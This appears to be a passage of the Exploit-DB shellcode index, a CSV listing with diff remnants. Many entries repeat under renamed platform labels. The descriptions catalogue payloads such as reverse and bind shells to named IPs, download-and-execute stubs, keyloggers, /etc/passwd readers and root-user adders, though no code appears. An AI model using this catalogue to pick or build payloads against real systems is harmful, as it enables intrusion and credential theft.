38469,shellcodes/linux_x86-64/38469.c,"Linux/x86-64 - Bind TCP (31173/TCP) Shell (/bin/sh) + Password (1234) Shellcode (92 bytes)",2015-10-15,d4sh&r,shellcode,linux_x86-64
38708,shellcodes/linux_x86-64/38708.asm,"Linux/x86-64 - Egghunter (0x6b634068) Shellcode (24 bytes)",2015-11-16,d4sh&r,shellcode,linux_x86-64
38815,shellcodes/linux_x86-64/38815.c,"Linux/x86-64 - execve() + Polymorphic Shellcode (31 bytes)",2015-11-25,d4sh&r,shellcode,linux_x86-64
38959,shellcodes/generator/38959.py,"Windows (XP < 10) - Command Generator WinExec + Null-Free Shellcode (Generator)",2015-12-13,B3mB4m,shellcode,generator
39149,shellcodes/linux_x86-64/39149.c,"Linux/x86-64 - Bind TCP (4444/TCP) Shell (/bin/sh) + Null-Free Shellcode (103 bytes)",2016-01-01,Scorpion_,shellcode,linux_x86-64
39152,shellcodes/linux_x86-64/39152.c,"Linux/x86-64 - Bind TCP (4444/TCP) Shell (/bin/sh) + Password (hack) + Null-Free Shellcode (162 bytes)",2016-01-02,"Sathish kumar",shellcode,linux_x86-64
38239,shellcodes/linux_x86-64/38239.asm,"Linux/x64 - execve() Shellcode (22 bytes)",2015-09-18,d4sh&r,shellcode,linux_x86-64
38469,shellcodes/linux_x86-64/38469.c,"Linux/x64 - Bind TCP (31173/TCP) Shell (/bin/sh) + Password (1234) Shellcode (92 bytes)",2015-10-15,d4sh&r,shellcode,linux_x86-64
38708,shellcodes/linux_x86-64/38708.asm,"Linux/x64 - Egghunter (0x6b634068) Shellcode (24 bytes)",2015-11-16,d4sh&r,shellcode,linux_x86-64
38815,shellcodes/linux_x86-64/38815.c,"Linux/x64 - execve() + Polymorphic Shellcode (31 bytes)",2015-11-25,d4sh&r,shellcode,linux_x86-64
38959,shellcodes/generator/38959.py,"Windows (XP < 10) - Command Generator WinExec() + Null-Free Shellcode (Generator)",2015-12-13,B3mB4m,shellcode,generator
39149,shellcodes/linux_x86-64/39149.c,"Linux/x64 - Bind TCP (4444/TCP) Shell (/bin/sh) + Null-Free Shellcode (103 bytes)",2016-01-01,Scorpion_,shellcode,linux_x86-64
39152,shellcodes/linux_x86-64/39152.c,"Linux/x64 - Bind TCP (4444/TCP) Shell (/bin/sh) + Password (hack) + Null-Free Shellcode (162 bytes)",2016-01-02,"Sathish kumar",shellcode,linux_x86-64
39160,shellcodes/linux_x86/39160.c,"Linux/x86 - execve(/bin/sh) Shellcode (24 bytes) (1)",2016-01-04,"Dennis 'dhn' Herrmann",shellcode,linux_x86
39185,shellcodes/linux_x86-64/39185.c,"Linux/x86-64 - Reverse TCP (127.0.0.1:4444/TCP) Shell (/bin/sh) + Password (hack) + Null-Free Shellcode (151 bytes)",2016-01-06,"Sathish kumar",shellcode,linux_x86-64
39203,shellcodes/linux_x86-64/39203.c,"Linux/x86-64 - Egghunter (0x50905090) Shellcode (18 bytes)",2016-01-08,"Sathish kumar",shellcode,linux_x86-64
39185,shellcodes/linux_x86-64/39185.c,"Linux/x64 - Reverse TCP (127.0.0.1:4444/TCP) Shell (/bin/sh) + Password (hack) + Null-Free Shellcode (151 bytes)",2016-01-06,"Sathish kumar",shellcode,linux_x86-64
39203,shellcodes/linux_x86-64/39203.c,"Linux/x64 - Egghunter (0x50905090) Shellcode (18 bytes)",2016-01-08,"Sathish kumar",shellcode,linux_x86-64
39204,shellcodes/linux_x86/39204.c,"Linux/x86 - Egghunter (0x4f904790) Shellcode (13 bytes)",2016-01-08,"Dennis 'dhn' Herrmann",shellcode,linux_x86
39312,shellcodes/linux_x86-64/39312.c,"Linux/x86-64 - execve() + XOR/NOT/DIV Encoded Shellcode (54 bytes)",2016-01-25,"Sathish kumar",shellcode,linux_x86-64
39336,shellcodes/linux/39336.c,"Linux x86/x86-64 - Reverse TCP (192.168.1.29:4444/TCP) Shell Shellcode (195 bytes)",2016-01-27,B3mB4m,shellcode,linux
39337,shellcodes/linux/39337.c,"Linux x86/x86-64 - Bind TCP (4444/TCP) Shell Shellcode (251 bytes)",2016-01-27,B3mB4m,shellcode,linux
39338,shellcodes/linux/39338.c,"Linux x86/x86-64 - Read /etc/passwd Shellcode (156 bytes)",2016-01-27,B3mB4m,shellcode,linux
39383,shellcodes/linux_x86-64/39383.c,"Linux/x86-64 - Reverse TCP (127.0.0.1:4444/TCP) Shell (/bin/sh) + Password (hack) + Polymorphic Shellcode (122 bytes)",2016-01-29,"Sathish kumar",shellcode,linux_x86-64
39388,shellcodes/linux_x86-64/39388.c,"Linux/x86-64 - Reverse TCP (127.0.0.1:4444/TCP) Shell + Password (hack) + Polymorphic Shellcode (135 bytes)",2016-02-01,"Sathish kumar",shellcode,linux_x86-64
39312,shellcodes/linux_x86-64/39312.c,"Linux/x64 - execve() + XOR/NOT/DIV Encoded Shellcode (54 bytes)",2016-01-25,"Sathish kumar",shellcode,linux_x86-64
39336,shellcodes/linux/39336.c,"Linux x86/x64 - Reverse TCP (192.168.1.29:4444/TCP) Shell Shellcode (195 bytes)",2016-01-27,B3mB4m,shellcode,linux
39337,shellcodes/linux/39337.c,"Linux x86/x64 - Bind TCP (4444/TCP) Shell Shellcode (251 bytes)",2016-01-27,B3mB4m,shellcode,linux
39338,shellcodes/linux/39338.c,"Linux x86/x64 - Read /etc/passwd Shellcode (156 bytes)",2016-01-27,B3mB4m,shellcode,linux
39383,shellcodes/linux_x86-64/39383.c,"Linux/x64 - Reverse TCP (127.0.0.1:4444/TCP) Shell (/bin/sh) + Password (hack) + Polymorphic Shellcode (122 bytes)",2016-01-29,"Sathish kumar",shellcode,linux_x86-64
39388,shellcodes/linux_x86-64/39388.c,"Linux/x64 - Reverse TCP (127.0.0.1:4444/TCP) Shell + Password (hack) + Polymorphic Shellcode (135 bytes)",2016-02-01,"Sathish kumar",shellcode,linux_x86-64
39389,shellcodes/linux_x86/39389.c,"Linux/x86 - Download File + Execute Shellcode (135 bytes)",2016-02-01,B3mB4m,shellcode,linux_x86
39390,shellcodes/linux_x86-64/39390.c,"Linux/x86-64 - execve() Stack + Polymorphic Shellcode (47 bytes)",2016-02-01,"Sathish kumar",shellcode,linux_x86-64
39390,shellcodes/linux_x86-64/39390.c,"Linux/x64 - execve() Stack + Polymorphic Shellcode (47 bytes)",2016-02-01,"Sathish kumar",shellcode,linux_x86-64
39496,shellcodes/arm/39496.c,"Linux/ARM - Reverse TCP (10.0.0.10:1337/TCP) Shell (/bin/sh) Shellcode (95 bytes)",2016-02-26,Xeon,shellcode,arm
39519,shellcodes/windows_x86/39519.c,"Windows/x86 - Download File + Run via WebDAV (//192.168.1.19/c) Null-Free Shellcode (96 bytes)",2016-03-02,"Sean Dillon",shellcode,windows_x86
39578,shellcodes/linux_x86-64/39578.c,"Linux/x86-64 - Reverse TCP (192.168.1.2:1234/TCP) Shell Shellcode (134 bytes)",2016-03-21,"Sudhanshu Chauhan",shellcode,linux_x86-64
39617,shellcodes/linux_x86-64/39617.c,"Linux/x86-64 - execve(/bin/sh) Shellcode (26 bytes)",2016-03-24,"Ajith Kp",shellcode,linux_x86-64
39624,shellcodes/linux_x86-64/39624.c,"Linux/x86-64 - execve(/bin/sh) Shellcode (25 bytes) (1)",2016-03-28,"Ajith Kp",shellcode,linux_x86-64
39625,shellcodes/linux_x86-64/39625.c,"Linux/x86-64 - execve(/bin/bash) Shellcode (33 bytes)",2016-03-28,"Ajith Kp",shellcode,linux_x86-64
39684,shellcodes/linux_x86-64/39684.c,"Linux/x86-64 - Bind TCP (5600/TCP) Shell Shellcode (81 bytes)",2016-04-11,"Ajith Kp",shellcode,linux_x86-64
39700,shellcodes/linux_x86-64/39700.c,"Linux/x86-64 - Read /etc/passwd Shellcode (65 bytes)",2016-04-15,"Ajith Kp",shellcode,linux_x86-64
39718,shellcodes/linux_x86-64/39718.c,"Linux/x86-64 - Bind TCP (5600/TCP) Shell Shellcode (86 bytes)",2016-04-21,"Ajith Kp",shellcode,linux_x86-64
40094,shellcodes/windows_x86/40094.c,"Windows/x86 - URLDownloadToFileA() (http://192.168.86.130/sample.exe) + SetFileAttributesA() (pyld.exe) + WinExec() + ExitProcess() Shellcode (394 bytes)",2016-07-13,"Roziul Hasan Khan Shifat",shellcode,windows_x86
39578,shellcodes/linux_x86-64/39578.c,"Linux/x64 - Reverse TCP (192.168.1.2:1234/TCP) Shell Shellcode (134 bytes)",2016-03-21,"Sudhanshu Chauhan",shellcode,linux_x86-64
39617,shellcodes/linux_x86-64/39617.c,"Linux/x64 - execve(/bin/sh) Shellcode (26 bytes)",2016-03-24,"Ajith Kp",shellcode,linux_x86-64
39624,shellcodes/linux_x86-64/39624.c,"Linux/x64 - execve(/bin/sh) Shellcode (25 bytes) (1)",2016-03-28,"Ajith Kp",shellcode,linux_x86-64
39625,shellcodes/linux_x86-64/39625.c,"Linux/x64 - execve(/bin/bash) Shellcode (33 bytes)",2016-03-28,"Ajith Kp",shellcode,linux_x86-64
39684,shellcodes/linux_x86-64/39684.c,"Linux/x64 - Bind TCP (5600/TCP) Shell Shellcode (81 bytes)",2016-04-11,"Ajith Kp",shellcode,linux_x86-64
39700,shellcodes/linux_x86-64/39700.c,"Linux/x64 - Read /etc/passwd Shellcode (65 bytes)",2016-04-15,"Ajith Kp",shellcode,linux_x86-64
39718,shellcodes/linux_x86-64/39718.c,"Linux/x64 - Bind TCP (5600/TCP) Shell Shellcode (86 bytes)",2016-04-21,"Ajith Kp",shellcode,linux_x86-64
40094,shellcodes/windows_x86/40094.c,"Windows/x86 - URLDownloadToFileA(http://192.168.86.130/sample.exe) + SetFileAttributesA(pyld.exe) + WinExec() + ExitProcess() Shellcode (394 bytes)",2016-07-13,"Roziul Hasan Khan Shifat",shellcode,windows_x86
39722,shellcodes/linux_x86/39722.c,"Linux/x86 - Reverse TCP (::ffff:192.168.64.129:1472/TCP) Shell (/bin/sh) + IPv6 Shellcode (159 bytes)",2016-04-25,"Roziul Hasan Khan Shifat",shellcode,linux_x86
39723,shellcodes/linux_x86/39723.c,"Linux/x86 - Bind TCP (1472/TCP) Shell (/bin/sh) + IPv6 Shellcode (1250 bytes)",2016-04-25,"Roziul Hasan Khan Shifat",shellcode,linux_x86
39728,shellcodes/generator/39728.py,"Linux/x86-64 - Bind TCP Shell Shellcode (Generator)",2016-04-25,"Ajith Kp",shellcode,generator
39728,shellcodes/generator/39728.py,"Linux/x64 - Bind TCP Shell Shellcode (Generator)",2016-04-25,"Ajith Kp",shellcode,generator
39731,shellcodes/windows/39731.c,"Windows - Keylogger to File (./log.bin) + Null-Free Shellcode (431 bytes)",2016-04-25,Fugu,shellcode,windows
39754,shellcodes/windows_x86/39754.txt,"Windows/x86 (.Net Framework) - Execute Native x86 Shellcode",2016-05-02,Jacky5112,shellcode,windows_x86
39758,shellcodes/linux_x86-64/39758.c,"Linux/x86-64 - Bind TCP (1472/TCP) Shell (/bin/sh) + IPv6 Shellcode (199 bytes)",2016-05-04,"Roziul Hasan Khan Shifat",shellcode,linux_x86-64
39763,shellcodes/linux_x86-64/39763.c,"Linux/x86-64 - Reverse TCP (192.168.209.131:1472/TCP) Shell (/bin/sh) + IPv6 Shellcode (203 bytes)",2016-05-04,"Roziul Hasan Khan Shifat",shellcode,linux_x86-64
39758,shellcodes/linux_x86-64/39758.c,"Linux/x64 - Bind TCP (1472/TCP) Shell (/bin/sh) + IPv6 Shellcode (199 bytes)",2016-05-04,"Roziul Hasan Khan Shifat",shellcode,linux_x86-64
39763,shellcodes/linux_x86-64/39763.c,"Linux/x64 - Reverse TCP (192.168.209.131:1472/TCP) Shell (/bin/sh) + IPv6 Shellcode (203 bytes)",2016-05-04,"Roziul Hasan Khan Shifat",shellcode,linux_x86-64
39794,shellcodes/windows/39794.c,"Windows - Keylogger to File (%TEMP%/log.bin) + Null-Free Shellcode (601 bytes)",2016-05-10,Fugu,shellcode,windows
39815,shellcodes/generator/39815.c,"Linux/x86 - Bind TCP (1234/TCP) Shell (/bin/sh) Shellcode (87 bytes) (Generator)",2016-05-16,JollyFrogs,shellcode,generator
39847,shellcodes/linux_x86-64/39847.c,"Linux/x86-64 - Download File (http://192.168.30.129/pri.sh) + Execute Used To Steal Information Shellcode (399 bytes)",2016-05-23,"Roziul Hasan Khan Shifat",shellcode,linux_x86-64
39847,shellcodes/linux_x86-64/39847.c,"Linux/x64 - Download File (http://192.168.30.129/pri.sh) + Execute Used To Steal Information Shellcode (399 bytes)",2016-05-23,"Roziul Hasan Khan Shifat",shellcode,linux_x86-64
39851,shellcodes/linux_x86/39851.c,"Linux/x86 - Bind TCP (4444/TCP) Shell (/bin/bash) Shellcode (656 bytes)",2016-05-25,"Brandon Dennis",shellcode,linux_x86
39869,shellcodes/linux_x86-64/39869.c,"Linux/x86-64 - execve() + XOR Encoded Shellcode (84 bytes)",2016-05-30,"Roziul Hasan Khan Shifat",shellcode,linux_x86-64
39885,shellcodes/multiple/39885.c,"BSD / Linux / Windows/x86-64/x86 - execve(_/bin//sh__ {_//bin/sh__ _-c__ _cmd_}_ NULL) Execute Command Shellcode (194 bytes)",2016-06-06,odzhancode,shellcode,multiple
39869,shellcodes/linux_x86-64/39869.c,"Linux/x64 - execve() + XOR Encoded Shellcode (84 bytes)",2016-05-30,"Roziul Hasan Khan Shifat",shellcode,linux_x86-64
39885,shellcodes/multiple/39885.c,"BSD / Linux / Windows - execve(_/bin//sh__ {_//bin/sh__ _-c__ _cmd_}_ NULL) Execute Command Shellcode (194 bytes)",2016-06-06,odzhancode,shellcode,multiple
39900,shellcodes/windows_x86/39900.c,"Windows/x86 - WinExec(_cmd.exe__0) Shellcode (184 bytes)",2016-06-07,"Roziul Hasan Khan Shifat",shellcode,windows_x86
39901,shellcodes/linux_x86/39901.c,"Linux/x86 - Bind TCP (13337/TCP) Netcat (/bin/nc) Shell (/bin/sh) Shellcode (56 bytes)",2016-06-07,sajith,shellcode,linux_x86
39914,shellcodes/windows_x86/39914.c,"Windows/x86 - system(systeminfo) Shellcode (224 bytes)",2016-06-10,"Roziul Hasan Khan Shifat",shellcode,windows_x86
39979,shellcodes/windows/39979.c,"Windows (XP < 10) - Download File + Execute Shellcode",2016-06-20,B3mB4m,shellcode,windows
40005,shellcodes/windows_x86/40005.c,"Windows/x86 - ShellExecuteA(NULL_NULL__cmd.exe__NULL_NULL_1) Shellcode (250 bytes)",2016-06-22,"Roziul Hasan Khan Shifat",shellcode,windows_x86
40026,shellcodes/linux_x86/40026.txt,"Linux/x86 - execve(/bin/sh) + ASLR Bruteforce Shellcode",2016-06-27,"Pawan Lal",shellcode,linux_x86
40029,shellcodes/linux_x86-64/40029.c,"Linux/x86-64 - Reverse TCP (192.168.86.128:1472/TCP) cat /etc/passwd Shellcode (164 bytes)",2016-06-28,"Roziul Hasan Khan Shifat",shellcode,linux_x86-64
40052,shellcodes/linux_x86-64/40052.c,"Linux/x86-64 - Bind TCP Netcat Shell + Null-Free Shellcode (64 bytes)",2016-07-04,Kyzer,shellcode,linux_x86-64
40029,shellcodes/linux_x86-64/40029.c,"Linux/x64 - Reverse TCP (192.168.86.128:1472/TCP) cat /etc/passwd Shellcode (164 bytes)",2016-06-28,"Roziul Hasan Khan Shifat",shellcode,linux_x86-64
40052,shellcodes/linux_x86-64/40052.c,"Linux/x64 - Bind TCP Netcat Shell + Null-Free Shellcode (64 bytes)",2016-07-04,Kyzer,shellcode,linux_x86-64
40056,shellcodes/linux_x86/40056.c,"Linux/x86 - Bind TCP (4444/TCP) Shell (/bin/sh) Shellcode (98 bytes)",2016-07-04,sajith,shellcode,linux_x86
40061,shellcodes/linux_x86-64/40061.c,"Linux/x86-64 - Bind TCP (4442/TCP) Ncat Shell + SSL + Multi-Channel (4444-4447/TCP) + Persistant + fork() + IPv4/6 + Password + Null-Free Shellcode (176 bytes)",2016-07-06,Kyzer,shellcode,linux_x86-64
40061,shellcodes/linux_x86-64/40061.c,"Linux/x64 - Bind TCP (4442/TCP) Ncat Shell + SSL + Multi-Channel (4444-4447/TCP) + Persistant + fork() + IPv4/6 + Password + Null-Free Shellcode (176 bytes)",2016-07-06,Kyzer,shellcode,linux_x86-64
40075,shellcodes/linux_x86/40075.c,"Linux/x86 - Reverse TCP (192.168.227.129:4444/TCP) Shell (/bin/sh) Shellcode (75 bytes)",2016-07-08,sajith,shellcode,linux_x86
40079,shellcodes/linux_x86-64/40079.c,"Linux/x86-64 - Reverse TCP (10.1.1.4/TCP) Shell + Continuously Probing via Socket + Port-Range (391-399) + Password (la crips) + Null-Free Shellcode (172 bytes)",2016-07-11,Kyzer,shellcode,linux_x86-64
40079,shellcodes/linux_x86-64/40079.c,"Linux/x64 - Reverse TCP (10.1.1.4/TCP) Shell + Continuously Probing via Socket + Port-Range (391-399) + Password (la crips) + Null-Free Shellcode (172 bytes)",2016-07-11,Kyzer,shellcode,linux_x86-64
40110,shellcodes/linux_x86/40110.c,"Linux/x86 - Reverse TCP (127.1.1.1:10) Xterm Shell Shellcode (68 bytes)",2016-07-13,RTV,shellcode,linux_x86
40122,shellcodes/linux_x86-64/40122.txt,"Linux/x86-64 - Bind TCP (4442/TCP) Shell + Syscall Persistent + Multi-Terminal/Port-Range (4444-4447/TCP) + Password (la crips) + Daemon Shellcode (83/148/177 bytes)",2016-07-19,Kyzer,shellcode,linux_x86-64
40122,shellcodes/linux_x86-64/40122.c,"Linux/x64 - Bind TCP (4442/TCP) Shell + Syscall Persistent + Multi-Terminal/Port-Range (4444-4447/TCP) + Password (la crips) + Daemon Shellcode (83/148/177 bytes)",2016-07-19,Kyzer,shellcode,linux_x86-64
40128,shellcodes/linux_crisv32/40128.c,"Linux/CRISv32 Axis Communication - Reverse TCP (192.168.57.1:443/TCP) Shell (/bin/sh) Shellcode (189 bytes)",2016-07-20,bashis,shellcode,linux_crisv32
40131,shellcodes/linux_x86/40131.c,"Linux/x86 - execve(/bin/sh) Shellcode (19 bytes)",2016-07-20,sajith,shellcode,linux_x86
40139,shellcodes/linux_x86-64/40139.c,"Linux/x86-64 - Reverse TCP (10.1.1.4:46357/TCP) Shell + Subtle Probing + Timer + Burst + Password (la crips) + Multi-Terminal Shellcode (84/122/172 bytes)",2016-07-21,Kyzer,shellcode,linux_x86-64
40139,shellcodes/linux_x86-64/40139.c,"Linux/x64 - Reverse TCP (10.1.1.4:46357/TCP) Shell + Subtle Probing + Timer + Burst + Password (la crips) + Multi-Terminal Shellcode (84/122/172 bytes)",2016-07-21,Kyzer,shellcode,linux_x86-64
40175,shellcodes/windows_x86/40175.c,"Windows/x86 (7) - localhost Port Scanner Shellcode (556 bytes)",2016-07-29,"Roziul Hasan Khan Shifat",shellcode,windows_x86
40179,shellcodes/linux_x86/40179.c,"Linux/x86 - Bind TCP/UDP (98/TCP + UDP) Netcat Shell Shellcode (44/52 bytes)",2016-07-29,Kyzer,shellcode,linux_x86
40222,shellcodes/linux_x86/40222.c,"Linux/x86 - Bind TCP (9090/TCP) Shell (/bin/zsh) Shellcode (96 bytes)",2016-08-10,thryb,shellcode,linux_x86
40223,shellcodes/linux_x86/40223.c,"Linux/x86 - Reverse TCP (127.255.255.254:9090/TCP) Shell (/bin/zsh) Shellcode (80 bytes)",2016-08-10,thryb,shellcode,linux_x86
40245,shellcodes/windows_x86/40245.c,"Windows/x86 - MessageBoxA Shellcode (242 bytes)",2016-08-16,"Roziul Hasan Khan Shifat",shellcode,windows_x86
40245,shellcodes/windows_x86/40245.c,"Windows/x86 - MessageBoxA() Shellcode (242 bytes)",2016-08-16,"Roziul Hasan Khan Shifat",shellcode,windows_x86
40246,shellcodes/windows_x86/40246.c,"Windows/x86 - CreateProcessA cmd.exe Shellcode (253 bytes)",2016-08-16,"Roziul Hasan Khan Shifat",shellcode,windows_x86
40259,shellcodes/windows_x86/40259.c,"Windows/x86 - InitiateSystemShutdownA() Shellcode (599 bytes)",2016-08-18,"Roziul Hasan Khan Shifat",shellcode,windows_x86
43562,shellcodes/linux_x86-64/43562.c,"Linux/x86-64 - Bind TCP (4444/TCP) + Stager + Egghunter (0x64616564) Shellcode (157 bytes)",2009-01-01,"Christophe G",shellcode,linux_x86-64
43563,shellcodes/linux_x86-64/43563.c,"Linux/x86-64 - Add User (pwned/$pass$) Using open_write_close To /etc/{passwd_shadow} Shellcode (358 bytes)",2009-01-01,"Christophe G",shellcode,linux_x86-64
43564,shellcodes/linux_x86-64/43564.c,"Linux/x86-64 - Add User (pwned/$pass$) Using echo cmd To /etc/{passwd_shadow} Shellcode (273 bytes)",2009-01-01,"Christophe G",shellcode,linux_x86-64
43565,shellcodes/linux_x86-64/43565.asm,"Linux/x86-64 - Read /etc/passwd Shellcode (82 bytes)",2009-01-01,Mr.Un1k0d3r,shellcode,linux_x86-64
43566,shellcodes/linux_x86-64/43566.asm,"Linux/x86-64 - Bind TCP (4444/TCP) Shell (/bin/sh) + Password (Password) Shellcode (173 bytes)",2009-01-01,"Christophe G",shellcode,linux_x86-64
43568,shellcodes/linux_x86-64/43568.asm,"Linux/x86-64 - Reverse TCP (192.168.1.9:4444/TCP) Shell (/bin/sh) + Password (doomedra) Shellcode (138 bytes)",2009-01-01,"Andriy Brukhovetskyy",shellcode,linux_x86-64
43570,shellcodes/linux_x86-64/43570.asm,"Linux/x86-64 - Bind TCP (4444/TCP) Shell (/bin/sh) + Password (doomedra) Shellcode (175 bytes)",2009-01-01,"Andriy Brukhovetskyy",shellcode,linux_x86-64
43597,shellcodes/linux_x86-64/43597.c,"Linux/x86-64 - Bind TCP (Random TCP Port) Shell + Null-Free Shellcode (57 bytes)",2009-01-01,"Geyslan G. Bem",shellcode,linux_x86-64
43598,shellcodes/linux_x86-64/43598.c,"Linux/x86-64 - Bind TCP (31337/TCP) Shell Shellcode (150 bytes)",2012-10-04,"Russell Willis",shellcode,linux_x86-64
43599,shellcodes/linux_x86-64/43599.c,"Linux/x86-64 - Reverse TCP (192.168.1.10:31337/TCP) Shell Shellcode (118 bytes)",2012-10-04,"Russell Willis",shellcode,linux_x86-64
43601,shellcodes/linux_x86-64/43601.asm,"Linux/x86-64 - Bind TCP (1337/TCP) Netcat (/bin/nc) Shell (/bin/sh) Shellcode (131 bytes)",2009-01-01,Gaussillusion,shellcode,linux_x86-64
43602,shellcodes/linux_x86-64/43602.asm,"Linux/x86-64 - Reverse TCP (127.0.0.1:1337/TCP) Netcat (/bin/nc) Shell (/bin/sh) Shellcode (109 bytes)",2009-01-01,Gaussillusion,shellcode,linux_x86-64
43603,shellcodes/linux_x86-64/43603.c,"Linux/x86-64 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (85 bytes)",2009-01-01,egeektronic,shellcode,linux_x86-64
43604,shellcodes/linux_x86-64/43604.c,"Linux/x86-64 - setreuid(0_0) + execve(/bin/csh_ [/bin/csh_ NULL]) + XOR Encoded Shellcode (87 bytes)",2009-01-01,egeektronic,shellcode,linux_x86-64
43605,shellcodes/linux_x86-64/43605.c,"Linux/x86-64 - setreuid(0_0) + execve(/bin/ksh_ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (87 bytes)",2009-01-01,egeektronic,shellcode,linux_x86-64
43606,shellcodes/linux_x86-64/43606.c,"Linux/x86-64 - setreuid(0_0) + execve(/bin/zsh_ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (87 bytes)",2009-01-01,egeektronic,shellcode,linux_x86-64
43607,shellcodes/linux_x86-64/43607.c,"Linux/x86-64 - sethostname(Rooted !) + killall Shellcode (33 bytes)",2009-01-01,zbt,shellcode,linux_x86-64
43562,shellcodes/linux_x86-64/43562.c,"Linux/x64 - Bind TCP (4444/TCP) + Stager + Egghunter (0x64616564) Shellcode (157 bytes)",2009-01-01,"Christophe G",shellcode,linux_x86-64
43563,shellcodes/linux_x86-64/43563.c,"Linux/x64 - Add User (pwned/$pass$) Using open_write_close To /etc/{passwd_shadow} Shellcode (358 bytes)",2009-01-01,"Christophe G",shellcode,linux_x86-64
43564,shellcodes/linux_x86-64/43564.c,"Linux/x64 - Add User (pwned/$pass$) Using echo cmd To /etc/{passwd_shadow} Shellcode (273 bytes)",2009-01-01,"Christophe G",shellcode,linux_x86-64
43565,shellcodes/linux_x86-64/43565.asm,"Linux/x64 - Read /etc/passwd Shellcode (82 bytes)",2009-01-01,Mr.Un1k0d3r,shellcode,linux_x86-64
43566,shellcodes/linux_x86-64/43566.asm,"Linux/x64 - Bind TCP (4444/TCP) Shell (/bin/sh) + Password (Password) Shellcode (173 bytes)",2009-01-01,"Christophe G",shellcode,linux_x86-64
43568,shellcodes/linux_x86-64/43568.asm,"Linux/x64 - Reverse TCP (192.168.1.9:4444/TCP) Shell (/bin/sh) + Password (doomedra) Shellcode (138 bytes)",2009-01-01,"Andriy Brukhovetskyy",shellcode,linux_x86-64
43570,shellcodes/linux_x86-64/43570.asm,"Linux/x64 - Bind TCP (4444/TCP) Shell (/bin/sh) + Password (doomedra) Shellcode (175 bytes)",2009-01-01,"Andriy Brukhovetskyy",shellcode,linux_x86-64
43597,shellcodes/linux_x86-64/43597.c,"Linux/x64 - Bind TCP (Random TCP Port) Shell + Null-Free Shellcode (57 bytes)",2009-01-01,"Geyslan G. Bem",shellcode,linux_x86-64
43598,shellcodes/linux_x86-64/43598.c,"Linux/x64 - Bind TCP (31337/TCP) Shell Shellcode (150 bytes)",2012-10-04,"Russell Willis",shellcode,linux_x86-64
43599,shellcodes/linux_x86-64/43599.c,"Linux/x64 - Reverse TCP (192.168.1.10:31337/TCP) Shell Shellcode (118 bytes)",2012-10-04,"Russell Willis",shellcode,linux_x86-64
43601,shellcodes/linux_x86-64/43601.asm,"Linux/x64 - Bind TCP (1337/TCP) Netcat (/bin/nc) Shell (/bin/sh) Shellcode (131 bytes)",2009-01-01,Gaussillusion,shellcode,linux_x86-64
43602,shellcodes/linux_x86-64/43602.asm,"Linux/x64 - Reverse TCP (127.0.0.1:1337/TCP) Netcat (/bin/nc) Shell (/bin/sh) Shellcode (109 bytes)",2009-01-01,Gaussillusion,shellcode,linux_x86-64
43603,shellcodes/linux_x86-64/43603.c,"Linux/x64 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (85 bytes)",2009-01-01,egeektronic,shellcode,linux_x86-64
43604,shellcodes/linux_x86-64/43604.c,"Linux/x64 - setreuid(0_0) + execve(/bin/csh_ [/bin/csh_ NULL]) + XOR Encoded Shellcode (87 bytes)",2009-01-01,egeektronic,shellcode,linux_x86-64
43605,shellcodes/linux_x86-64/43605.c,"Linux/x64 - setreuid(0_0) + execve(/bin/ksh_ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (87 bytes)",2009-01-01,egeektronic,shellcode,linux_x86-64
43606,shellcodes/linux_x86-64/43606.c,"Linux/x64 - setreuid(0_0) + execve(/bin/zsh_ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (87 bytes)",2009-01-01,egeektronic,shellcode,linux_x86-64
43607,shellcodes/linux_x86-64/43607.c,"Linux/x64 - sethostname(Rooted !) + killall Shellcode (33 bytes)",2009-01-01,zbt,shellcode,linux_x86-64
43608,shellcodes/openbsd_x86/43608.c,"OpenBSD/x86 - reboot() Shellcode (15 bytes)",2009-01-01,beosroot,shellcode,openbsd_x86
43610,shellcodes/osx_ppc/43610.c,"OSX/PPC - Remote findsock by recv() Key Shellcode",2009-01-01,"Dino Dai Zovi",shellcode,osx_ppc
43611,shellcodes/osx_ppc/43611.asm,"OSX/PPC - Reverse TCP Shell (/bin/csh) Shellcode",2009-01-01,"H D Moore",shellcode,osx_ppc
@ -755,34 +755,35 @@ id,file,description,date,author,type,platform
43773,shellcodes/windows_x86/43773.c,"Windows/x86 (XP SP3) (English) - calc.exe Shellcode (16 bytes)",2010-07-10,"John Leitch",shellcode,windows_x86
43774,shellcodes/windows_x86/43774.c,"Windows/x86 (XP SP3) - MessageBox Shellcode (11 bytes)",2009-01-01,d3c0der,shellcode,windows_x86
43778,shellcodes/arm/43778.asm,"Linux/ARM - Reverse TCP (192.168.1.1:4444/TCP) Shell (/bin/sh) + Password (MyPasswd) + Null-Free Shellcode (156 bytes)",2018-01-15,rtmcx,shellcode,arm
40549,shellcodes/windows_x86-64/40549.c,"Windows/x86-64 - WinExec(cmd.exe) Shellcode (93 bytes)",2016-10-17,"Roziul Hasan Khan Shifat",shellcode,windows_x86-64
43890,shellcodes/linux_x86/43890.c,"Linux/x86 - execve(/bin/sh) + ROT-N + Shift-N + XOR-N Encoded Shellcode (77 bytes)",2018-01-23,"Hashim Jawad",shellcode,linux_x86
40549,shellcodes/windows_x86-64/40549.c,"Windows/x64 - WinExec(cmd.exe) Shellcode (93 bytes)",2016-10-17,"Roziul Hasan Khan Shifat",shellcode,windows_x86-64
40560,shellcodes/windows_x86/40560.asm,"Windows/x86 - Reverse UDP (www.example.com:4444/UDP) Keylogger Shellcode (493 bytes)",2016-10-17,Fugu,shellcode,windows_x86
40781,shellcodes/windows_x86-64/40781.c,"Windows/x86-64 - Reverse TCP (192.168.232.129:4444/TCP) Shell + Injection Shellcode (694 bytes)",2016-11-18,"Roziul Hasan Khan Shifat",shellcode,windows_x86-64
40808,shellcodes/linux_x86-64/40808.c,"Linux/x86-64 - execve(/bin/sh) -c reboot Shellcode (89 bytes)",2016-11-22,"Ashiyane Digital Security Team",shellcode,linux_x86-64
40821,shellcodes/windows_x86-64/40821.c,"Windows/x86-64 - Download File (http://192.168.10.129/pl.exe) + Execute (C:/Users/Public/p.exe) Shellcode (358 bytes)",2016-11-23,"Roziul Hasan Khan Shifat",shellcode,windows_x86-64
